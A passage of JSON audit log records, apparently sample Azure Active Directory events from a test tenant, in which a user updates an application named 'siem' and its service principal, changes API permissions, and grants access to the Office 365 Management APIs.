\"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": 
"extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "528b5206-f6de-4c1f-86db-5f750a9960c9"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:33:26.1037807Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38438635"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "8f6eb24b-6e61-4ee2-a376-31368c300613"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:33:26", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, 
{"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "NewValue": "[\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": 
true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]"}, {"NewValue": "RequiredResourceAccess", "OldValue": "", "Name": "Included Updated Properties"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "528b5206-f6de-4c1f-86db-5f750a9960c9"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": 
"env_time", "Value": "2020-02-09T15:33:26.1037807Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38438635"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "8f6eb24b-6e61-4ee2-a376-31368c300613"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:33:26", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": 
"08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"NewValue": "[\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "OldValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "Name": "RequiredResourceAccess"}, {"NewValue": "RequiredResourceAccess", "OldValue": "", "Name": "Included Updated Properties"}], "ResultStatus": 
"Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "528b5206-f6de-4c1f-86db-5f750a9960c9"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:33:26.1037807Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38438635"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": 
"MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "8f6eb24b-6e61-4ee2-a376-31368c300613"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:33:26", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "Included Updated Properties", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": 
"actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "528b5206-f6de-4c1f-86db-5f750a9960c9"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:33:26.1638042Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38438642"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", 
"Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "b2cc2456-5ac5-4399-b960-82a40036476f"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:33:26", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "Included Updated Properties", "OldValue": "", "NewValue": ""}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", 
"Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "528b5206-f6de-4c1f-86db-5f750a9960c9"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:33:26.1638042Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38438642"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": 
"env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "b2cc2456-5ac5-4399-b960-82a40036476f"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": 
"ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "ac045271-8d7f-49b2-abc9-5130051d879f"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
